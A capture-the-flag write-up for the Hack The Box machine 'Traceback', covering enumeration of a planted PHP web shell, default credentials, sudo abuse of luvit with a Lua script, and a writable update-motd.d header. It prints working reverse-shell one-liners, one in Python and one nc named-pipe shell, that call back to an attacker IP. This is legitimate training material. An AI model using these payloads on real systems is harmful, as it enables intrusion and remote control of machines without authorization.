Again, we start with nmap -sC -sV -Pn -p- -oA ./Traceback 10.10.10.181
We've got HTTP and SSH on a their standard ports. Let's start with the HTTP info and go from there.
Checking the HTML source gives us:
<!--Some of the best web shells that you might need ;)-->
I seem to remember something on this somewhere, so let's jump to Google and verify.
Well, at least we now have a list of filenames we can easily Gobuster with.....
Dump the file names into a shells.txt file and Gobust away.
Got one! smevk.php is my page. If we look at that GitHub page and the source of smevk.php, we find the creds are admin:admin
So, we log in and ...... Huh? smevk the crap?!?! After my eyes stop bleeding, we see that we have the ability to execute system commands. Let's (please GOD) use this to gain a reverse shell because looking at SmEvK v3 is seriously damaging to my eyeballs. Drop:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.7",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
into the Execute section (after starting an nc -lvnp 9999 of course) and run it. Sweet Merciful Computer Gods, we have a shell and can at least minimize the craziness. Now, instead of worrying about the LinEnum script just yet, I'm going to jump over to the webadmin user's Home directory first. In there we find a note.txt
We have this mention of Lua and to a sysadmin. So, first let's check sudo -l and see what we can actually do.
$ sudo -l
Matching Defaults entries for webadmin on traceback:
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit
We can run "luvit" as sysadmin, but we can't see what exactly it does (except we know it executes lua code). Let's try this:
echo "require('os');" > priv.lua
echo "os.execute('/bin/bash');" >> priv.lua
sudo -u sysadmin /home/sysadmin/luvit ./priv.lua
Success!! We are now sysadmin. Bash -i gets a better interactive shell. Grab the user flag and onward to root.
It's a good thing that we haven't tried any scripts yet. We unfortunately need to jump BACK to the SmEvK console and upload PSPY64. It'll take some doing, as in you'll have to disconnect the reverse shell, upload it, and then jump back to sysadmin, but once you have it running (which you'll have to disconnect AGAIN to stop running it [maybe I should have made ssh keys as a stop-gap......]) you'll see that update-motd.d runs every 30 seconds or so.
/bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
Well, crap. It looks like I should have created those ssh keys because I need the 00-header inside of update-motd.d to run when I ssh to the system. So, here goes. I copy my key into the authorized_keys file (no I'm not publishing it here) set up the replacement header as:
echo -ne '#!/bin/sh\n\nrm -rf /tmp/p; mknod /tmp/p p; /bin/bash </tmp/p | /bin/nc 10.10.14.7 4444 >/tmp/p' > /etc/update-motd.d/00-header
and here's where speed is of the essence. It's nc -lvnp 4444; echo to replace the header, and then immediate ssh -i sysadmin_traceback firstname.lastname@example.org. You have only 30 seconds to complete the task.